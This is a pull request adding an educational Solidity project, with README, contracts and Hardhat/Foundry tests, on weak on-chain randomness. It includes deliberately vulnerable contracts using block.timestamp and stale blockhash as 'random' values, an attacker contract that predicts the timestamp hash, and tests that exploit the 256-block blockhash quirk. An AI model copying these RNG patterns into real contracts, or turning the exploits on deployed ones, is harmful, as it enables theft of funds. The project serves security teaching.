### PR TITLE
Finished working on the “breaking-rng” project

### DIFF
--- a/.gitmodules
+++ b/.gitmodules
@@ -44,3 +44,9 @@
 	path = projects/stateful-libraries/lib/openzeppelin-contracts
 	url = https://github.com/OpenZeppelin/openzeppelin-contracts
 	
+[submodule "projects/breaking-rng/lib/forge-std"]
+	path = projects/breaking-rng/lib/forge-std
+	url = https://github.com/foundry-rs/forge-std
+[submodule "projects/breaking-rng/lib/openzeppelin-contracts"]
+	path = projects/breaking-rng/lib/openzeppelin-contracts
+	url = https://github.com/OpenZeppelin/openzeppelin-contracts

--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -12,6 +12,21 @@ importers:
         specifier: ^16.4.7
         version: 16.4.7
 
+  projects/breaking-rng:
+    devDependencies:
+      '@nomicfoundation/hardhat-toolbox':
+        specifier: ^3.0.0
+        version: 3.0.0(2d3abb387c20b834f0438128392bbac2)
+      '@openzeppelin/contracts':
+        specifier: ^5.2.0
+        version: 5.2.0
+      dotenv:
+        specifier: ^16.0.0
+        version: 16.4.7
+      hardhat:
+        specifier: ^2.22.0
+        version: 2.22.19(ts-node@10.9.2(@types/node@22.13.11)(typescript@5.8.2))(typescript@5.8.2)
+
   projects/eip-1271:
     dependencies:
       '@metamask/eth-sig-util':

--- a/projects/breaking-rng/README.md
+++ b/projects/breaking-rng/README.md
@@ -1,0 +1,88 @@
+# Breaking-Rng
+Breaking-Rng는 Solidity에서 흔히 사용되는 RNG(Random Number Generator) 구현 방식의 취약점을 이해하고 직접 실습해볼 수 있는 교육용 프로젝트입니다.
+block.timestamp 기반 랜덤값 예측, blockhash 기반의 commit-reveal 패턴 무력화 등 다양한 공격 시나리오를 Hardhat 및 Foundry 테스트를 통해 재현하고 학습합니다.
+
+- Shadeling
+    - block.timestamp를 이용해 계산된 해시를 “무작위 값”으로 사용하는 잘못된 RNG 예제
+    - 동일 블록 내에서 공격자가 keccak256(abi.encode(block.timestamp))를 예측하여 predict() 호출 시 isPredicted를 true로 만드는 방법을 테스트로 검증
+
+- ElderShadeling
+    - commit-reveal 방식으로 blockhash를 “랜덤값”으로 사용하는 두 번째 예제
+    - 커밋된 시점(blockNumber = N)으로부터 256블록 이후에는 blockhash(N+1)이 0x0이 되어버리는 EVM 특성을 악용해 checkPrediction()을 무력화하는 방법을 실습
+
+---
+
+## 📦 프로젝트 구조
+
+```
+projects/breaking-rng/
+├── contracts/
+│ └── ElderShadeling.sol # 256블록 이후에는 blockhash(N+1)이 0x0이 되어버리는 EVM 특성을 악용한 Rng 위험성 예시 컨트랙트
+│ └── Shadeling.sol # block.timestamp를 이용한 Rng 위험성 예시 컨트랙트
+├── test/
+│ └── ElderShadeling.debug.test.js # Hardhat 기반 ElderShadeling 테스트
+│ └── HackShadeling.debug.test.js # Hardhat 기반 Shadeling 테스트
+├── foundry/
+│ └── test/
+│     └── ElderShadeling.t.sol # Foundry 기반 ElderShadeling 테스트
+│     └── HackShadeling.t.sol # Foundry 기반 hadeling 테스트
+├── foundry.toml # Foundry 설정 파일
+├── hardhat.config.js # Hardhat 설정 파일
+├── package.json
+└── README.md
+```
+
+---
+
+## ⚙️ 개발 환경
+- Node,js (v22.14)
+- pnpm (v10.6.5)
+- hardhat (v2.22.0)
+- ethers.js (v6.13.5)
+- foundry (forge Version: 1.0.0-stable)
+
+---
+
+## 🛠️ 설치
+```bash
+# 모노레포 루트에서 설치
+pnpm --filter breaking-rng install
+
+# breaking-rng 프로젝트로 진입하여 설치
+cd projects/breaking-rng
+pnpm install
+```
+
+---
+
+## 🧱 Compile
+```bash
+# 모노레포 루트에서 컴파일
+pnpm --filter breaking-rng run compile
+
+# breaking-rng 프로젝트로 진입하여 컴파일
+cd projects/breaking-rng
+pnpm run compile
+
+# foundry로 컴파일
+cd projects/breaking-rng/foundry
+forge build
+```
+
+---
+
+## 🧪 Test
+```bash
+# 모노레포 루트에서 Hardhat 테스트
+pnpm --filter breaking-rng run test
+
+# breaking-rng 프로젝트로 진입하여 Hardhat 테스트
+cd projects/breaking-rng
+pnpm run test
+
+# foundry로 테스트
+cd projects/breaking-rng/foundry
+forge test -vv
+```
+
+---

--- a/projects/breaking-rng/contracts/ElderShadeling.sol
+++ b/projects/breaking-rng/contracts/ElderShadeling.sol
@@ -1,0 +1,26 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.20;
+
+contract ElderShadeling {
+    bytes32 prediction;
+    uint256 blockNumber;
+    bool committed;
+
+    bool public isPredicted;
+
+    function commitPrediction(bytes32 x) external {
+        prediction = x;
+        blockNumber = block.number;
+        committed = true;
+    }
+
+    function checkPrediction() external {
+        require(committed, "Prediction not committed");
+        
+        // Ensure prediction is checked at a later block.
+        require(block.number > blockNumber + 1);
+        require(prediction == blockhash(blockNumber + 1));
+        isPredicted = true;
+    }
+    
+}

--- a/projects/breaking-rng/contracts/Shadeling.sol
+++ b/projects/breaking-rng/contracts/Shadeling.sol
@@ -1,0 +1,28 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.20;
+
+contract Shadeling {
+    bool public isPredicted;
+
+    function predict(bytes32 x) external {
+        require(x == _random());
+        isPredicted = true;
+    }
+
+    function _random() internal view returns (bytes32) {
+        return keccak256(abi.encode(block.timestamp));
+    }
+}
+
+contract HackShadeling {
+
+    Shadeling public shadelingAddr;
+    constructor(address _shadeling) {
+        shadelingAddr = Shadeling(_shadeling);
+    }
+
+    function hack() public {
+        bytes32 randomVal = keccak256(abi.encode(block.timestamp));
+        shadelingAddr.predict(randomVal);
+    }
+}

--- a/projects/breaking-rng/foundry.toml
+++ b/projects/breaking-rng/foundry.toml
@@ -1,0 +1,6 @@
+[profile.default]
+src = "contracts"
+test = "foundry/test"
+out = "foundry/out"
+libs = ["lib"]
+auto_detect_remappings = true

--- a/projects/breaking-rng/foundry/test/ElderShadeling.t.sol
+++ b/projects/breaking-rng/foundry/test/ElderShadeling.t.sol
@@ -1,0 +1,32 @@
+// test/ElderShadeling.t.sol
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.19;
+
+import "forge-std/Test.sol";
+import "../../contracts/ElderShadeling.sol";
+
+contract ElderShadelingTest is Test {
+    ElderShadeling elder;
+
+    function setUp() public {
+        elder = new ElderShadeling();
+    }
+
+    function testPredictBecomesTrueAfter256Blocks() public {
+        // 1) 현재 블록 번호를 N으로 고정
+        vm.roll(100);  // 임의로 100번 블록으로 설정
+        uint256 commitBlock = block.number; // = 100
+
+        // 2) commitPrediction(0x00...00) 호출 → blockNumber = 100 저장
+        bytes32 zeroBytes = bytes32(0);
+        elder.commitPrediction(zeroBytes);
+
+        // 3) 블록 번호를 N+258 (=358)로 롤링
+        //    → 이제 원래 N+1 (=101) 블록은 256블록 이전으로 밀려나 blockhash(101) == 0
+        vm.roll(commitBlock + 258); // = 100 + 258 = 358
+
+        // 4) checkPrediction() 호출 → isPredicted가 true가 되는지 확인
+        elder.checkPrediction();
+        assertEq(elder.isPredicted(), true);
+    }
+}

--- a/projects/breaking-rng/foundry/test/HackShadeling.t.sol
+++ b/projects/breaking-rng/foundry/test/HackShadeling.t.sol
@@ -1,0 +1,31 @@
+// test/HackShadeling.t.sol
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.20;
+
+import "forge-std/Test.sol";
+import "../../contracts/Shadeling.sol";
+
+contract HackShadelingTest is Test {
+    Shadeling public shadeling;
+    HackShadeling public hacker;
+
+    function setUp() public {
+        // 1) Shadeling 배포
+        shadeling = new Shadeling();
+        // 2) HackShadeling 배포 (Shadeling 주소 전달)
+        hacker = new HackShadeling(address(shadeling));
+    }
+
+    function testHackShadelingSucceeds() public {
+        // 3) isPredicted는 초기에 false여야 함
+        bool initial = shadeling.isPredicted();
+        assertEq(initial, false, "initial isPredicted must be false");
+
+        // 4) hack() 호출 (같은 블록에서 block.timestamp를 사용해 _random() 예측)
+        hacker.hack();
+
+        // 5) isPredicted가 true로 바뀌었는지 확인
+        bool afterHack = shadeling.isPredicted();
+        assertEq(afterHack, true, "after hack(), isPredicted must be true");
+    }
+}

--- a/projects/breaking-rng/hardhat.config.js
+++ b/projects/breaking-rng/hardhat.config.js
@@ -1,0 +1,22 @@
+
+require("@nomicfoundation/hardhat-toolbox");
+require("dotenv").config({ path: require("path").resolve(__dirname, "../../.env") });
+
+module.exports = {
+  solidity: {
+    version: "0.8.28",
+    settings: {
+      evmVersion: "cancun", // 👈 중요: cancun 버전 활성화
+      optimizer: {
+        enabled: true,
+        runs: 200
+      }
+    }
+  },
+  // defaultNetwork: "development", // --network 생략하려면 필요. but 무조건 외부 provider 띄워야 함
+  networks: {
+    development: {
+      url: `http://127.0.0.1:8545`
+    }
+  }
+};

--- a/projects/breaking-rng/package.json
+++ b/projects/breaking-rng/package.json
@@ -1,0 +1,15 @@
+{
+  "name": "breaking-rng",
+  "version": "1.0.0",
+  "scripts": {
+    "compile": "hardhat compile",
+    "test": "hardhat test",
+    "deploy": "hardhat run scripts/deploy.js"
+  },
+  "devDependencies": {
+    "hardhat": "^2.22.0",
+    "@nomicfoundation/hardhat-toolbox": "^3.0.0",
+    "@openzeppelin/contracts": "^5.2.0",
+    "dotenv": "^16.0.0"
+  }
+}

--- a/projects/breaking-rng/remappings.txt
+++ b/projects/breaking-rng/remappings.txt
@@ -1,0 +1,3 @@
+@contracts/=contracts/
+@lib/=lib/
+@openzeppelin/=lib/openzeppelin-contracts/

--- a/projects/breaking-rng/test/ElderShadeling.debug.test.js
+++ b/projects/breaking-rng/test/ElderShadeling.debug.test.js
@@ -1,0 +1,38 @@
+// tests/ElderShadeling.test.js
+const { expect } = require("chai");
+const { ethers, network } = require("hardhat");
+
+describe("ElderShadeling", function () {
+    let ElderShadeling, elder, deployer;
+
+    beforeEach(async function () {
+        [deployer] = await ethers.getSigners();
+        ElderShadeling = await ethers.getContractFactory("ElderShadeling");
+        elder = await ElderShadeling.deploy();
+        await elder.waitForDeployment();
+    });
+
+    it("256 블록 이후에 blockhash가 0이 되어 isPredicted가 true가 되는지 확인", async function () {
+        // 1) commitPrediction에 0x00...00을 커밋
+        const zeroBytes32 = "0x" + "00".repeat(32);
+        await elder.connect(deployer).commitPrediction(zeroBytes32);
+
+        // 블록 넘버 기록
+        const commitBlock = await ethers.provider.getBlockNumber();
+
+        // 2) Hardhat 네트워크에서 블록을 257개 채굴 (mine) → blockNumber + 1이 256블록보다 과거가 되도록
+        //    -- Hardhat에서는 `hardhat_mine` RPC를 사용해 블록을 빠르게 미리 채굴할 수 있음.
+        //    -- 257개를 채굴해야 (커밋 블록 다음 블록도 포함하여) 최소 256블록 이전으로 밀림
+        await network.provider.send("hardhat_mine", ["0x101"]); // 0x101 = 257 in hex
+
+        // (선택사항) 현재 블록 번호가 commitBlock + 257이 되었는지 확인
+        const afterMineBlock = await ethers.provider.getBlockNumber();
+        expect(afterMineBlock).to.be.gte(commitBlock + 257);
+
+        // 3) 이제 checkPrediction 호출
+        await elder.connect(deployer).checkPrediction();
+
+        // 4) isPredicted가 true로 바뀌었는지 확인
+        expect(await elder.isPredicted()).to.equal(true);
+    });
+});

--- a/projects/breaking-rng/test/HackShadeling.debug.test.js
+++ b/projects/breaking-rng/test/HackShadeling.debug.test.js
@@ -1,0 +1,37 @@
+// test/HackShadeling.test.js
+
+const { expect } = require("chai");
+const { ethers } = require("hardhat");
+
+describe("HackShadeling attack test (Hardhat)", function () {
+    let Shadeling, HackShadeling;
+    let shadeling, hacker;
+    let deployer, user;
+
+    before(async function () {
+        [deployer, user] = await ethers.getSigners();
+        Shadeling = await ethers.getContractFactory("Shadeling", deployer);
+        HackShadeling = await ethers.getContractFactory("HackShadeling", deployer);
+    });
+
+    beforeEach(async function () {
+        // 1) Shadeling 배포
+        shadeling = await Shadeling.deploy();
+        await shadeling.waitForDeployment();
+
+        // 2) HackShadeling 배포 (Shadeling 주소 전달)
+        hacker = await HackShadeling.deploy(await shadeling.getAddress());
+        await hacker.waitForDeployment();
+    });
+
+    it("hack()을 호출하면 Shadeling.isPredicted가 true가 된다", async function () {
+        // 처음에 isPredicted는 false
+        expect(await shadeling.isPredicted()).to.equal(false);
+
+        // 3) hack() 호출 (같은 블록의 block.timestamp를 이용해 _random() 예측)
+        await hacker.connect(user).hack();
+
+        // 4) 공격 성공 검사
+        expect(await shadeling.isPredicted()).to.equal(true);
+    });
+});


### PR DESCRIPTION
- Shadeling
    - Bad RNG example using a hash computed using block.timestamp as a “random value”
    - Test validates how an attacker can predict keccak256(abi.encode(block.timestamp)) within the same block, making isPredicted true when calling predict()

- ElderShadeling
    - Second example of using blockhash as a “random value” in a commit-reveal fashion
    - Demonstrate how to defeat checkPrediction() by exploiting an EVM quirk that causes blockhash(N+1) to be 0x0 256 blocks after a commit (blockNumber = N).